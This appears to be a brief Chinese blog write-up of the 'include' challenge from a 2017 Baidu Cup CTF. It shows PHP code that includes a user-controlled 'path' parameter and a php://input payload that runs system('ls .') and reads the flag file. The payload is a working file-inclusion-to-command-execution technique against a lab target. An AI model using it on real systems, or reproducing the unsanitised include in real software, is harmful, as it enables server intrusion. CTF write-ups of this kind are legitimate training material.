“百度杯”CTF比赛 2017 二月场_include_WriteUp

打开网站

image

题目类型:文件包含

代码审计

<?php 
show_source(__FILE__);
if(isset($_REQUEST['path'])){
    include($_REQUEST['path']); //包含path传递的参数
}else{
    include('phpinfo.php');
}

思路

使用php://input伪协议
image

获得flag
image

payload

/?path=php://input
<?php system('ls .');?>
<?php system('cat dle345aae.php');?>

posted @ 2021-12-01 15:19  oldliutou  阅读(37)  评论(0编辑  收藏  举报